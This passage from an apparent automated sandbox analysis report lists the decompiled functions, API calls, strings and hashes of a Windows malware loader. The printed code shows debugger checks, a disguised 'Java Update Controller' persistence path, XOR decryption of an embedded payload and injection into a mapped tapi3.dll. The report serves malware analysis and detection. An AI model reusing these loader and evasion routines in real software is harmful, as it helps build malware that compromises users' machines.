Opcode Fuzzy Hash: 1cacb4d76965ee7aec90e8d59cbc4c6dd3d6d13f75afdeedfd96a81e330b5fd0
Instruction Fuzzy Hash: 7EB0927018A2C64BC30197210C29AA77B582BA1212BAD81AED0C00655ACB280571A7B2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: 935aa375omok5c.exe PID: 5576 Parent PID: 3388 935aa375omok5c.exeCOMMON

Executed Functions

Function 004015C6, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 95%

			_entry_() {
				char _v8;
				char _v12;
				void* _t10;
				signed int _t11;
				void* _t23;
				void* _t29;

				_v8 = 0;
				_v12 = 0;
				_t10 = 0;
				while( *((intOrPtr*)(_t10 + 0x403026)) == 0) {
					_t10 = _t10 + 1;
					if(_t10 < 0x100) {
						continue;
					}
					break;
				}
				_t11 =  *[fs:0x30];
				if(_t11 == 0 ||  *((char*)(_t11 + 2)) != 1) {
					SetErrorMode(0x8007); // executed
					SetUnhandledExceptionFilter(E0040102F); // executed
					GetModuleFileNameW(0, L"C:\\ProgramData\\Java Update Controller\\935aa375omok5c.exe", 0x104);
					asm("sbb eax, eax");
					 *0x403330 =  ~( ~( *[fs:0x30]));
					E00401101();
					if(E0040116C() != 1) {
						_t31 = E004013A7();
						if(_t20 != 0) {
							_t23 = E004014F4(_t31,  &_v12,  &_v8); // executed
							_t30 = _t23;
							if(_t23 != 0 && E0040146F( *((intOrPtr*)(_t31 + 0x1c)), _t30, 0x403000) != 0) {
								E00401C93(_t29, _t30, _v12, _v8); // executed
							}
						}
						goto L11;
					}
					L6:
					WaitForSingleObjectEx(0xffffffff, 0x1388, 1);
					goto L6;
				} else {
					L11:
					ExitProcess(0);
				}
			}

APIs

SetErrorMode.KERNELBASE(00008007), ref: 00401601
SetUnhandledExceptionFilter.KERNELBASE(0040102F), ref: 0040160C
GetModuleFileNameW.KERNEL32(00000000,C:\ProgramData\Java Update Controller\935aa375omok5c.exe,00000104), ref: 0040161D
WaitForSingleObjectEx.KERNEL32(000000FF,00001388,00000001), ref: 0040164C
ExitProcess.KERNEL32 ref: 00401691

Strings

C:\ProgramData\Java Update Controller\935aa375omok5c.exe, xrefs: 00401617

Memory Dump Source

Source File: 00000016.00000002.363849910.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.363872739.0000000000433000.00000040.00020000.sdmp Download File

Similarity

API ID: ErrorExceptionExitFileFilterModeModuleNameObjectProcessSingleUnhandledWait
String ID: C:\ProgramData\Java Update Controller\935aa375omok5c.exe
API String ID: 917555860-2350083609
Opcode ID: 16f356daf6f393dde2f0bf725c7fffae60c82fbc2685a6c3713f5e0e04f7ae90
Instruction ID: 3836bf5afa92f843fd13b347da58792fe200a265b58757a495e8483f53cbbfd5
Opcode Fuzzy Hash: 16f356daf6f393dde2f0bf725c7fffae60c82fbc2685a6c3713f5e0e04f7ae90
Instruction Fuzzy Hash: 1511D6719403447FDB21AFB08E89E6E7AACAB05700F14097AF202F71F1CABD9A40871C

Uniqueness

Uniqueness Score: -1.00%

Function 021F0000, Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 285memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,?,72D08B8C), ref: 021F018C
VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 021F01FD
CreateActCtxA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 021F0306

Strings

a, xrefs: 021F02CB
, xrefs: 021F02D6

Memory Dump Source

Source File: 00000016.00000002.364863448.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false

Similarity

API ID: Virtual$AllocCreateProtect
String ID: $a
API String ID: 2413513597-206647194
Opcode ID: 2b74b7560147f6a3171f96d9c91d11626458d92188a21795b354f158c7a4578d
Instruction ID: 3c45f137f53f0625a7ed2952429cbbb088d259b10308ab4df3fb75095741ade5
Opcode Fuzzy Hash: 2b74b7560147f6a3171f96d9c91d11626458d92188a21795b354f158c7a4578d
Instruction Fuzzy Hash: F2C16871608301CFC764CF24C894A2AB7F2FF88314F55896DEAA69B356C771E849CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00401101, Relevance: 49.0, APIs: 14, Strings: 14, Instructions: 32
libraryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401101() {
				struct HINSTANCE__* _t14;

				LoadLibraryA("user32.dll");
				LoadLibraryA("secur32.dll"); // executed
				LoadLibraryA("crypt32.dll"); // executed
				LoadLibraryA("advapi32.dll");
				LoadLibraryA("wininet.dll"); // executed
				LoadLibraryA("shell32.dll"); // executed
				LoadLibraryA("shlwapi.dll");
				LoadLibraryA("ole32.dll"); // executed
				LoadLibraryA("version.dll"); // executed
				LoadLibraryA("sfc.dll"); // executed
				LoadLibraryA("sfc_os.dll"); // executed
				LoadLibraryA("ws2_32.dll"); // executed
				LoadLibraryA("Netapi32.dll"); // executed
				_t14 = LoadLibraryA("Urlmon.dll"); // executed
				return _t14;
			}

0x0040110d
0x00401114
0x0040111b
0x00401122
0x00401129
0x00401130
0x00401137
0x0040113e
0x00401145
0x0040114c
0x00401153
0x0040115a
0x00401161
0x00401168
0x0040116b

APIs

LoadLibraryA.KERNEL32(user32.dll,?,00401639), ref: 0040110D
LoadLibraryA.KERNELBASE(secur32.dll,?,00401639), ref: 00401114
LoadLibraryA.KERNELBASE(crypt32.dll,?,00401639), ref: 0040111B
LoadLibraryA.KERNEL32(advapi32.dll,?,00401639), ref: 00401122
LoadLibraryA.KERNELBASE(wininet.dll,?,00401639), ref: 00401129
LoadLibraryA.KERNELBASE(shell32.dll,?,00401639), ref: 00401130
LoadLibraryA.KERNEL32(shlwapi.dll,?,00401639), ref: 00401137
LoadLibraryA.KERNELBASE(ole32.dll,?,00401639), ref: 0040113E
LoadLibraryA.KERNELBASE(version.dll,?,00401639), ref: 00401145
LoadLibraryA.KERNELBASE(sfc.dll,?,00401639), ref: 0040114C
LoadLibraryA.KERNELBASE(sfc_os.dll,?,00401639), ref: 00401153
LoadLibraryA.KERNELBASE(ws2_32.dll,?,00401639), ref: 0040115A
LoadLibraryA.KERNELBASE(Netapi32.dll,?,00401639), ref: 00401161
LoadLibraryA.KERNELBASE(Urlmon.dll,?,00401639), ref: 00401168

Strings

shell32.dll, xrefs: 0040112B
wininet.dll, xrefs: 00401124
sfc_os.dll, xrefs: 0040114E
Netapi32.dll, xrefs: 0040115C
ws2_32.dll, xrefs: 00401155
version.dll, xrefs: 00401140
shlwapi.dll, xrefs: 00401132
ole32.dll, xrefs: 00401139
secur32.dll, xrefs: 0040110F
Urlmon.dll, xrefs: 00401163
sfc.dll, xrefs: 00401147
crypt32.dll, xrefs: 00401116
advapi32.dll, xrefs: 0040111D
user32.dll, xrefs: 00401108

Memory Dump Source

Source File: 00000016.00000002.363849910.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.363872739.0000000000433000.00000040.00020000.sdmp Download File

Similarity

API ID: LibraryLoad
String ID: Netapi32.dll$Urlmon.dll$advapi32.dll$crypt32.dll$ole32.dll$secur32.dll$sfc.dll$sfc_os.dll$shell32.dll$shlwapi.dll$user32.dll$version.dll$wininet.dll$ws2_32.dll
API String ID: 1029625771-4252655668
Opcode ID: f165507b56b44f60dc8062e918fe79b13f6a80f187b183035aee990d7e1dbbaf
Instruction ID: c6160a1b9cfaf449a6d20608b7edf9e9bb879aa63acb4ce97e8131481719129b
Opcode Fuzzy Hash: f165507b56b44f60dc8062e918fe79b13f6a80f187b183035aee990d7e1dbbaf
Instruction Fuzzy Hash: 94E0C961ED233A6985A833EA2F0EB4B2D159984AA07308173A7483A0C108F80488D9FA

Uniqueness

Uniqueness Score: -1.00%

Function 00465B30, Relevance: 44.0, APIs: 6, Strings: 19, Instructions: 278clipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00466130: __time64.LIBCMT ref: 00466137

__mbstowcs_l.LIBCMTD ref: 00465BE0
_printf.LIBCMT ref: 00465BFF
_memset.LIBCMT ref: 00465DC4
_memset.LIBCMT ref: 00465DD7
_memset.LIBCMT ref: 00465DEA
GetClipboardViewer.USER32 ref: 00465E83

Part of subcall function 00465700: _memset.LIBCMT ref: 004658CA
Part of subcall function 00465700: _memset.LIBCMT ref: 004658DD
Part of subcall function 00465700: _memset.LIBCMT ref: 004658F0

Part of subcall function 004664D0: _memset.LIBCMT ref: 004666A3
Part of subcall function 004664D0: _memset.LIBCMT ref: 004666B6
Part of subcall function 004664D0: _memset.LIBCMT ref: 004666C9

Strings

(, xrefs: 00465D2C
Hgk, xrefs: 00466014
#, xrefs: 00465C0E
1, xrefs: 00465C48
,, xrefs: 00465D6F
d, xrefs: 00465B94
,, xrefs: 00465DA8
I, xrefs: 00465FD5
0, xrefs: 00465D65
%, xrefs: 00465D9E
$0E, xrefs: 00465EBB
.$0E, xrefs: 00465F26
), xrefs: 00465F9A
), xrefs: 00465D40
., xrefs: 00465C23
(, xrefs: 00465C64
4, xrefs: 0046605F
E, xrefs: 00465F6A
$, xrefs: 00465DB2

Memory Dump Source

Source File: 00000016.00000002.363897086.0000000000435000.00000020.00020000.sdmp, Offset: 00435000, based on PE: false

Similarity

API ID: _memset$ClipboardViewer__mbstowcs_l__time64_printf
String ID: #$$$$0E$%$($($)$)$,$,$.$.$0E$0$1$4$E$Hgk$I$d
API String ID: 1608630491-1412388925
Opcode ID: 148077b0c63a78c9abe49763fc62a40806259ca165aaf537506a8ea09efd280e
Instruction ID: 700c67253eb6594f03873fa8a082217b5a17d7b849bcb616d1a63a29c799b457
Opcode Fuzzy Hash: 148077b0c63a78c9abe49763fc62a40806259ca165aaf537506a8ea09efd280e
Instruction Fuzzy Hash: 3CE13870D05268CAEB24DF69CC54BEDBBB1AF59304F0481E9D14CA7282E7B94B84CF56

Uniqueness

Uniqueness Score: -1.00%

Function 00401A64, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 102
filememoryCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E00401A64(void* __ecx, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				struct _MEMORY_BASIC_INFORMATION _v44;
				short _v564;
				void* _t18;
				void* _t19;
				void* _t21;
				void* _t23;
				long _t29;
				void* _t35;
				void* _t37;

				_t35 = __ecx;
				_t37 = 0;
				_push(0x103);
				_v12 = 0;
				_push( &_v564);
				if( *0x403330 != 1) {
					_push(L"%SystemRoot%\\system32\\tapi3.dll");
				} else {
					_push(L"%SystemRoot%\\SysWOW64\\tapi3.dll");
				}
				ExpandEnvironmentStringsW();
				_t18 = CreateFileW( &_v564, 0xa0000000, 1, 0, 3, 0, 0); // executed
				_v8 = _t18;
				if(_t18 == 0xffffffff) {
					L15:
					_t19 = VirtualAllocEx(0xffffffff, 0, _a4, 0x3000, 0x40); // executed
					_t37 = _t19;
					goto L16;
				} else {
					_t21 = CreateFileMappingW(_t18, 0, 0x1000020, 0, 0, 0); // executed
					_v16 = _t21;
					if(_t21 != 0) {
						_t23 = MapViewOfFileEx(_t21, 4, 0, 0, 0, 0); // executed
						_t37 = _t23;
						if(_t37 != 0) {
							E00401EF0(_t35,  &_v44, 0, 0x1c);
							if(VirtualQueryEx(0xffffffff, _t37,  &_v44, 0x1c) == 0 || _v44.AllocationBase == 0) {
								_t29 = 0;
							} else {
								_t29 = _v44.RegionSize;
							}
							if(_t29 < _a4 || VirtualProtectEx(0xffffffff, _t37, _t29, 0x40,  &_v12) == 0) {
								UnmapViewOfFile(_t37);
								_t37 = 0;
							}
						}
						FindCloseChangeNotification(_v16); // executed
					}
					CloseHandle(_v8);
					if(_t37 != 0) {
						L16:
						return _t37;
					} else {
						goto L15;
					}
				}
			}

APIs

ExpandEnvironmentStringsW.KERNEL32(%SystemRoot%\system32\tapi3.dll,?,00000103,00000000,00000000), ref: 00401A97
CreateFileW.KERNELBASE(?,A0000000,00000001,00000000,00000003,00000000,00000000), ref: 00401AB0
CreateFileMappingW.KERNELBASE(00000000,00000000,01000020,00000000,00000000,00000000,00000000), ref: 00401ACD
MapViewOfFileEx.KERNELBASE(00000000,00000004,00000000,00000000,00000000,00000000), ref: 00401AE7
VirtualQueryEx.KERNEL32(000000FF,00000000,?,0000001C,?,00000000,0000001C), ref: 00401B08
VirtualProtectEx.KERNEL32(000000FF,00000000,?,00000040,?), ref: 00401B2D
UnmapViewOfFile.KERNEL32(00000000), ref: 00401B38
FindCloseChangeNotification.KERNELBASE(00000000), ref: 00401B43
CloseHandle.KERNEL32(?), ref: 00401B48
VirtualAllocEx.KERNELBASE(000000FF,00000000,?,00003000,00000040), ref: 00401B5C

Strings

%SystemRoot%\SysWOW64\tapi3.dll, xrefs: 00401A8B
%SystemRoot%\system32\tapi3.dll, xrefs: 00401A92

Memory Dump Source

Source File: 00000016.00000002.363849910.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.363872739.0000000000433000.00000040.00020000.sdmp Download File

Similarity

API ID: File$Virtual$CloseCreateView$AllocChangeEnvironmentExpandFindHandleMappingNotificationProtectQueryStringsUnmap
String ID: %SystemRoot%\SysWOW64\tapi3.dll$%SystemRoot%\system32\tapi3.dll
API String ID: 2285273178-2587703990
Opcode ID: 7ea4ae7d62663dac588de496447d734ad1b4c255d74485fb057ddaeff3d2a4e4
Instruction ID: ff1ab7b9a154434b078cfd845dddc1b4d5ca4656e23ee3035cdc8c4c75dd8609
Opcode Fuzzy Hash: 7ea4ae7d62663dac588de496447d734ad1b4c255d74485fb057ddaeff3d2a4e4
Instruction Fuzzy Hash: 52316F71601224BBDB209BA29D4DFDF7E7DEB457A0F104126F615B21E0D7789940CAB8

Uniqueness

Uniqueness Score: -1.00%

Function 0214052B, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 146memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 021405D2

Strings

$%^&, xrefs: 0214054E
VirtualAlloc, xrefs: 021405B5, 021405B8

Memory Dump Source

Source File: 00000016.00000002.364721021.0000000002140000.00000040.00000001.sdmp, Offset: 02140000, based on PE: false

Similarity

API ID: AllocVirtual
String ID: $%^&$VirtualAlloc
API String ID: 4275171209-2930927500
Opcode ID: 128dc75834e9ad2a6b52fe1c1afeff82a75eff64c00f1dce390f303ae35420aa
Instruction ID: be18a194816d5a46a032813b070bdc2fe841cdb287f59f03e2a3d8448882d12d
Opcode Fuzzy Hash: 128dc75834e9ad2a6b52fe1c1afeff82a75eff64c00f1dce390f303ae35420aa
Instruction Fuzzy Hash: 4651D820E842D88EDF09D7E9C4547EEBFF29F5E314F085068D68EAF341CB6544058BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00401C93, Relevance: 6.1, APIs: 4, Instructions: 115
memoryCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E00401C93(void* __ecx, intOrPtr _a4, intOrPtr _a8, int _a12) {
				void* _v8;
				char _v12;
				void* __edi;
				int _t22;
				void* _t28;
				void* _t43;
				void* _t59;

				_t47 = __ecx;
				_push(__ecx);
				_push(__ecx);
				if(_a4 != 0 && _a8 != 0) {
					_t22 = _a12;
					if(_t22 != 0 &&  *((char*)(_t22 + 0xc)) != 0) {
						_t22 = VirtualAllocEx(0xffffffff, 0, 0x2ca, 0x3000, 4); // executed
						_t43 = _t22;
						if(_t43 != 0) {
							E00401EA8(_t47, _t43, _a12, 0x2ca);
							if(E00401C1C(_t43, 0, 0) != 0) {
								_t28 = E00401A64(_t47,  *((intOrPtr*)(_t43 + 0xd2)) + 0x40); // executed
								_t59 = _t28;
								_v8 = _t59;
								if(_t59 != 0) {
									E00401EA8(_t47, _t59, _a4,  *((intOrPtr*)(_t43 + 0xd6)));
									if(E00401C1C(_a12,  &_v12, 0) == 0) {
										L14:
										VirtualFreeEx(0xffffffff, _t43, 0, 0x8000);
										_t22 = VirtualFreeEx(0xffffffff, _v8, 0, 0x8000);
									} else {
										 *((intOrPtr*)(_a12 + 0xc6)) = _t59;
										E00401EF0(_t47, _a12 + 0x172, 0, 0xd8);
										if(E00401C1C(_a12,  &_v12, 1) == 0) {
											goto L14;
										} else {
											_t16 = _t43 + 0x8d; // 0x8d
											if(E00401B6C(_t16, _t59, _a4) == 0) {
												goto L14;
											} else {
												E00401EF0(_t47, _a4, 0, _a8);
												_t19 = _t43 + 0x8d; // 0x8d
												if(E00401DE0(_t19, _t59, _t59) != 0) {
													E00401BC1(_t59); // executed
													_t22 =  *((intOrPtr*)( *((intOrPtr*)(_t43 + 0xba)) + _t59))(); // executed
												} else {
													goto L14;
												}
											}
										}
									}
								} else {
									_push(0x8000);
									_push(_t28);
									goto L9;
								}
							} else {
								_push(0x8000);
								_push(0);
								L9:
								_t22 = VirtualFreeEx(0xffffffff, _t43, ??, ??);
							}
						}
					}
				}
				return _t22;
			}

APIs

VirtualAllocEx.KERNELBASE(000000FF,00000000,000002CA,00003000,00000004,00000000,00000000,00000000,?,?,?,00401690,00000000,?,?,00000000), ref: 00401CD4
VirtualFreeEx.KERNEL32(000000FF,00000000,00000000,00008000,?,00000000,00000000,?,000002CA,?,?,?,00401690,00000000,?,?), ref: 00401D25
VirtualFreeEx.KERNEL32(000000FF,00000000,00000000,00008000,00000000,00000000,?,?,?,00000000,00000000,?,000002CA), ref: 00401DBB
VirtualFreeEx.KERNEL32(000000FF,?,00000000,00008000,?,?,?,00401690,00000000,?,?,00000000,00403000,?,?), ref: 00401DC5

Memory Dump Source

Source File: 00000016.00000002.363849910.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.363872739.0000000000433000.00000040.00020000.sdmp Download File

Similarity

API ID: Virtual$Free$Alloc
String ID:
API String ID: 1852963964-0
Opcode ID: 50474ef40392900078d1c1e9966c05bd9e0f654d43ca66715a63aa594671440b
Instruction ID: f9fcf59574da430c1a6b732967f2834c2ec0a047f5effb3bdd3c8fa8699f7250
Opcode Fuzzy Hash: 50474ef40392900078d1c1e9966c05bd9e0f654d43ca66715a63aa594671440b
Instruction Fuzzy Hash: 3231A532641214BBEB219F52CC45F9F3A69AF41768F144137FE14BA1E2C678E801C7B8

Uniqueness

Uniqueness Score: -1.00%

Function 004014F4, Relevance: 4.6, APIs: 3, Instructions: 82
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004014F4(void* __esi, long* _a4, intOrPtr* _a8) {
				signed int _v5;
				void* _v12;
				long _v16;
				long _v20;
				int _t28;
				void* _t29;
				void* _t30;
				intOrPtr _t35;
				void* _t38;
				long* _t43;
				long _t47;
				void* _t48;

				_t48 = __esi;
				if(__esi == 0) {
					L9:
					return 0;
				}
				_t47 =  *(__esi + 0x10);
				if(_t47 == 0 || _a8 == 0) {
					goto L9;
				} else {
					_v20 = _v20 & 0x00000000;
					_v5 =  *((intOrPtr*)(__esi + 0x20));
					_v16 = _t47 << 2;
					_t9 = _t48 + 0x21; // 0x21
					_t38 = _t9;
					_t28 = VirtualProtectEx(0xffffffff, _t38, _t47, 0x40,  &_v20); // executed
					if(_t28 == 0) {
						goto L9;
					}
					_t29 = 0;
					if(_t47 == 0) {
						L6:
						_t30 = VirtualAllocEx(0xffffffff, 0, _v16, 0x3000, 0x40); // executed
						_v12 = _t30;
						if(_t30 == 0) {
							goto L9;
						}
						_t41 = _t47;
						if(E0040172C(_t38, _t47, _t30,  *((intOrPtr*)(_t48 + 0x1c)) + 1) != 0xffffffff) {
							E00401EF0(_t41, _t38, 0, _t47);
							_t35 = E0040141D( *((intOrPtr*)(_t48 + 0x1c)), _v12);
							if(_t35 == 0) {
								goto L8;
							}
							_t43 = _a4;
							if(_t43 != 0) {
								 *_t43 = _v16;
							}
							 *_a8 = _t35;
							return _v12;
						}
						L8:
						VirtualFreeEx(0xffffffff, _v12, 0, 0x8000);
						goto L9;
					} else {
						goto L5;
					}
					do {
						L5:
						 *(_t29 + _t38) =  *(_t29 + _t38) ^ _v5;
						_t29 = _t29 + 1;
					} while (_t29 < _t47);
					goto L6;
				}
			}

APIs

VirtualProtectEx.KERNELBASE(000000FF,00000021,?,00000040,00000000,?,00000000), ref: 00401534
VirtualAllocEx.KERNELBASE(000000FF,00000000,00000000,00003000,00000040,?,00000000), ref: 0040155D
VirtualFreeEx.KERNEL32(000000FF,?,00000000,00008000,00000021,00000000,?,00000000,?,?,00000000), ref: 0040158A

Memory Dump Source

Source File: 00000016.00000002.363849910.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.363872739.0000000000433000.00000040.00020000.sdmp Download File

Similarity

API ID: Virtual$AllocFreeProtect
String ID:
API String ID: 267585107-0
Opcode ID: fe66257a1f73ed0b155cc7ecb0db77d5d6d1a3ba21762caee2cd5fb9bfd8b697
Instruction ID: 60848499d300f86fbef513db6b8c65875fd33c34f0bfce4cd9a3d67e81c81be2
Opcode Fuzzy Hash: fe66257a1f73ed0b155cc7ecb0db77d5d6d1a3ba21762caee2cd5fb9bfd8b697
Instruction Fuzzy Hash: 4A21E531600304BBDB218B68CC41F6FB7B9AF88750F14462AF522BE2E0D634E901CB18

Uniqueness

Uniqueness Score: -1.00%

Function 0046D59B, Relevance: 3.0, APIs: 2, Instructions: 18COMMON

Download Yara Rule

APIs

__lock.LIBCMT ref: 0046D5B3

Part of subcall function 0046F7BA: __mtinitlocknum.LIBCMT ref: 0046F7CE
Part of subcall function 0046F7BA: __amsg_exit.LIBCMT ref: 0046F7DA
Part of subcall function 0046F7BA: RtlEnterCriticalSection.NTDLL(?), ref: 0046F7E2

__tzset_nolock.LIBCMT ref: 0046D5C4

Part of subcall function 0046CEB9: __lock.LIBCMT ref: 0046CEDB
Part of subcall function 0046CEB9: __invoke_watson.LIBCMT ref: 0046CEFF
Part of subcall function 0046CEB9: __invoke_watson.LIBCMT ref: 0046CF1A
Part of subcall function 0046CEB9: __invoke_watson.LIBCMT ref: 0046CF35
Part of subcall function 0046CEB9: ____lc_codepage_func.LIBCMT ref: 0046CF3D
Part of subcall function 0046CEB9: _strlen.LIBCMT ref: 0046CF9D
Part of subcall function 0046CEB9: __malloc_crt.LIBCMT ref: 0046CFA4
Part of subcall function 0046CEB9: _strlen.LIBCMT ref: 0046CFBA

Memory Dump Source

Source File: 00000016.00000002.363897086.0000000000435000.00000020.00020000.sdmp, Offset: 00435000, based on PE: false

Similarity

API ID: __invoke_watson$__lock_strlen$CriticalEnterSection____lc_codepage_func__amsg_exit__malloc_crt__mtinitlocknum__tzset_nolock
String ID:
API String ID: 4249203040-0
Opcode ID: 34486a136c314bdbb2aa6c71ee9808a9741bf43a35ccfb2515075a6e4ae2af8b
Instruction ID: fd0474b085ff404bd2e571feb78e13acf7435792ef62a450d1af9b86101bcb34
Opcode Fuzzy Hash: 34486a136c314bdbb2aa6c71ee9808a9741bf43a35ccfb2515075a6e4ae2af8b
Instruction Fuzzy Hash: 13E0CDB1D41610E5C751FBA1590231D72B0BB24B19F30017FF491516C2FB380688C6DF

Uniqueness

Uniqueness Score: -1.00%

Function 021F05DB, Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,?,00000000,?,?,?,021F0327,2B14D0EE,?), ref: 021F0607

Memory Dump Source

Source File: 00000016.00000002.364863448.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 76b35eb126b5d398c3241770d81ee5b7efebad686aa1f8164dd06303da8c9cbe
Instruction ID: 7132a87a52268858e9b54cd2a8a54d6ceb3dd6f70ab4c64ba76e52bba4af471d
Opcode Fuzzy Hash: 76b35eb126b5d398c3241770d81ee5b7efebad686aa1f8164dd06303da8c9cbe
Instruction Fuzzy Hash: AE113075640225AFDF50CF18C880A6677A8FF8867871A8065EE69DB307D771FD11CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0046A682, Relevance: 1.5, APIs: 1, Instructions: 5COMMON

Download Yara Rule

APIs

__make__time64_t.LIBCMT ref: 0046A688

Memory Dump Source

Source File: 00000016.00000002.363897086.0000000000435000.00000020.00020000.sdmp, Offset: 00435000, based on PE: false

Similarity

API ID: __make__time64_t
String ID:
API String ID: 1242165881-0
Opcode ID: 346630e11f1ee5a3441dd37804dce0ed885e3ff36472b19c64210fc271ae5001
Instruction ID: 47007f602433d6f7d6e26bde3218195ff3f181c202248e0ca23f1311f1b3762b
Opcode Fuzzy Hash: 346630e11f1ee5a3441dd37804dce0ed885e3ff36472b19c64210fc271ae5001
Instruction Fuzzy Hash: 56A022B22003002AC200A2808802B0833800FC0B00F20200EB20B080C3AAA088F02A03

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0046A91D, Relevance: 7.6, APIs: 5, Instructions: 57COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0046DD53
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0046DD68
UnhandledExceptionFilter.KERNEL32(0047A6B0), ref: 0046DD73
GetCurrentProcess.KERNEL32(C0000409), ref: 0046DD8F
TerminateProcess.KERNEL32(00000000), ref: 0046DD96

Memory Dump Source

Source File: 00000016.00000002.363897086.0000000000435000.00000020.00020000.sdmp, Offset: 00435000, based on PE: false

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 63cdc36b2a330fd1ca6b7e919bda516e5bd17e60cd1f123a24149354f10ba704
Instruction ID: 2d47b1f5393d2efb13456d14475326a92099908a080006c87d6d8ddfad89470b
Opcode Fuzzy Hash: 63cdc36b2a330fd1ca6b7e919bda516e5bd17e60cd1f123a24149354f10ba704
Instruction Fuzzy Hash: 5721CAF4902204AFD740EF69ED497983BA4BB68305F20417BE50CD6371E7B459988F0E

Uniqueness

Uniqueness Score: -1.00%

Function 00465700, Relevance: 45.7, APIs: 7, Strings: 19, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004658CA
_memset.LIBCMT ref: 004658DD
_memset.LIBCMT ref: 004658F0
GetProcessHeap.KERNEL32 ref: 004659C2
PulseEvent.KERNEL32(00000020), ref: 00465A01
GetCommandLineA.KERNEL32 ref: 00465A2A
RtlAllocateHeap.NTDLL(?,00040000,00000BD7), ref: 00465A49

Part of subcall function 00465480: _memset.LIBCMT ref: 00465649
Part of subcall function 00465480: _memset.LIBCMT ref: 0046565C
Part of subcall function 00465480: _memset.LIBCMT ref: 0046566F

Strings

Hgk, xrefs: 00465A4F, 00465AC5
#, xrefs: 0046571F
+, xrefs: 00465759
!, xrefs: 00465868
+, xrefs: 00465883
*, xrefs: 004658B5
., xrefs: 0046585E
*, xrefs: 00465843
-, xrefs: 00465B0E
*, xrefs: 00465760
,, xrefs: 00465979
$, xrefs: 00465839
", xrefs: 00465739
/, xrefs: 00465726
Hgk, xrefs: 00465ACB
,, xrefs: 004658AB
", xrefs: 00465872
+, xrefs: 00465747
-, xrefs: 00465732

Memory Dump Source

Source File: 00000016.00000002.363897086.0000000000435000.00000020.00020000.sdmp, Offset: 00435000, based on PE: false

Similarity

API ID: _memset$Heap$AllocateCommandEventLineProcessPulse
String ID: !$"$"$#$$$*$*$*$+$+$+$,$,$-$-$.$/$Hgk$Hgk
API String ID: 1246828854-80630500
Opcode ID: 19c3f43bf9c42374cf7d2b0703023e7434c025d3cca6d2fc616f89796bf3af09
Instruction ID: d0e18d3924f78b2e5a40437ed3d8f451c71f4136e27571aa874f96deab625756
Opcode Fuzzy Hash: 19c3f43bf9c42374cf7d2b0703023e7434c025d3cca6d2fc616f89796bf3af09
Instruction Fuzzy Hash: 56B12D70D042A9CAEB20CF64DD58BDDBBB1AF55304F0081E9D54DA7381D7B94A84CF56

Uniqueness

Uniqueness Score: -1.00%

Function 00465480, Relevance: 33.4, APIs: 3, Strings: 16, Instructions: 116COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00465649
_memset.LIBCMT ref: 0046565C
_memset.LIBCMT ref: 0046566F

Strings

', xrefs: 004655F1
, xrefs: 00465620
", xrefs: 004654B1
", xrefs: 004654DF
2, xrefs: 0046562A
0, xrefs: 0046549E
#, xrefs: 004655FB
%, xrefs: 004654D8
1, xrefs: 004655B8
!, xrefs: 004654BF
2, xrefs: 00465602
", xrefs: 004654B8
#, xrefs: 004655E7
*, xrefs: 00465634
', xrefs: 004654AD
2, xrefs: 0046560C

Memory Dump Source

Source File: 00000016.00000002.363897086.0000000000435000.00000020.00020000.sdmp, Offset: 00435000, based on PE: false

Similarity

API ID: _memset
String ID: $!$"$"$"$#$#$%$'$'$*$0$1$2$2$2
API String ID: 2102423945-3661243402
Opcode ID: 74704727a06b6c581659efdf0d34761b66777fed0e1a3b33ba01139ccbff8de4
Instruction ID: 4d12989412911d3be82f1898c46339c032e289c7a4e2019be794ed19b57e04df
Opcode Fuzzy Hash: 74704727a06b6c581659efdf0d34761b66777fed0e1a3b33ba01139ccbff8de4
Instruction Fuzzy Hash: 32510C709083A99AEB21DF64DC187DDBBB1AF15308F0490D9D04CBB282D7BA0B84DF56

Uniqueness

Uniqueness Score: -1.00%

Function 0040116C, Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 191
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E0040116C() {
				void* _v8;
				int _v12;
				int* _v16;
				int* _v20;
				intOrPtr _v24;
				char _v28;
				char _v40;
				char _v56;
				char _v120;
				char _v184;
				char _v248;
				char _v508;
				char _t60;
				intOrPtr _t61;
				void* _t73;
				void* _t77;
				void* _t81;
				long _t90;
				long _t99;
